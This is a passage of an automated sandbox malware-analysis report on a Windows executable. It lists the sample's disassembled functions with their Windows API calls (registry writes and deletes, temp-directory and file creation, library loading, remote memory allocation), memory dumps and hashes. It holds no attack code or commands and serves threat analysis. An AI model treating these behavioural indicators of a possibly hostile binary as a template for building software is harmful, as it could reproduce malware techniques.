                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                          • Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
                                                          • Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                          • Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19
                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                          • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                          • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                          • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                          Function 00402421 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteValue
                                                          • String ID:
                                                          • API String ID: 2831762973-0
                                                          • Opcode ID: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                          • Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
                                                          • Opcode Fuzzy Hash: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                          • Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE
                                                          Function 00401EC5 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                          • Instruction ID: 2686c2d45ba130581374544c13beebfcaf73fd10f5aa92b185336ae358fe78f7
                                                          • Opcode Fuzzy Hash: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                          • Instruction Fuzzy Hash: 69E09232B04200EFD714EFA5EA8856E7BB0EB40325B20413FF001F20C1DAB848418A69
                                                          Function 00406500 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                            • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                            • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                            • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                          • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                          • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                          • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                          Function 00405C90 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\fbXZ4ErQMU.exe,80000000,00000003), ref: 00405C94
                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                          • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                          • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                          • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                          Function 00405761 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                          • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                          • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                          • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                          Function 70052A38 Relevance: 1.6, APIs: 1, Instructions: 143memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(00000000), ref: 70052AF7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          • Associated: 00000000.00000002.53321293003.0000000070050000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321420725.0000000070053000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321477933.0000000070055000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: a7f36b9d41e94d27e7a27f86776a389fd0f0776cb09cf60f358c111fd05c904e
                                                          • Instruction ID: acfd1222973212a052e32f38a801abca2f50c5095665c4b4b98c1713c5d1b4b3
                                                          • Opcode Fuzzy Hash: a7f36b9d41e94d27e7a27f86776a389fd0f0776cb09cf60f358c111fd05c904e
                                                          • Instruction Fuzzy Hash: E3414B73504204DFEB219FB5DC82F9D37B5EF46B38F305829E605D62A1D774A8888BA1
                                                          Function 0040266D Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: wsprintf
                                                          • String ID:
                                                          • API String ID: 2111968516-0
                                                          • Opcode ID: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                          • Instruction ID: 7f5a5d1368c13d317d2e99ee4d98356b480ceadea176dd08c5889da6900fd1c4
                                                          • Opcode Fuzzy Hash: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                          • Instruction Fuzzy Hash: 7E21B730D04299FADF328BA885886AEBB749F11314F1440BFE491B73D1C2BD8A85DB19
                                                          Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          • Opcode ID: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                          • Instruction ID: c16fe538d576f0a812f108a5c598968f2bbae53de2c44bc87e09c6d73b5458c5
                                                          • Opcode Fuzzy Hash: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                          • Instruction Fuzzy Hash: EEF01D3160852496DB20ABA54E49E5F3264DB42769B24033BF422B21D1EABC8542956E
                                                          Function 0040272B Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                          • Instruction ID: d2cb0ca5e863be2ef59b536234997f243a65a7806d73518010ac019a9530af38
                                                          • Opcode Fuzzy Hash: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                          • Instruction Fuzzy Hash: 7EE09271B00114EED711FBA4AE49DBF77B8EB40315B10403BF102F10C1CABC49128A2E
                                                          Function 0040239C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                          • Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
                                                          • Opcode Fuzzy Hash: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                          • Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
                                                          Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: PathSearch
                                                          • String ID:
                                                          • API String ID: 2203818243-0
                                                          • Opcode ID: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                          • Instruction ID: 99b882ef8ac932529d6fdfe3c41faefb6a71927cb26e20fd81cb329c01224dc0
                                                          • Opcode Fuzzy Hash: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                          • Instruction Fuzzy Hash: 93E0DF72304210EFD710DF649E49BAB37A8DF10368B20427AE111A60C2E6F89906873D
                                                          Function 00405FAB Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                          • Instruction ID: 8c71f3c26dc4a4bf3eef9e60a583d004d00a96479e721722a8f6be6a9d57506c
                                                          • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                          • Instruction Fuzzy Hash: 1CE0E6B201450ABEDF095F50DD0ED7B3B1DE704300F14452EF906D4050E6B5A9205A34
                                                          Function 00405D08 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                          • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                          • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                          • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                          Function 00405D37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
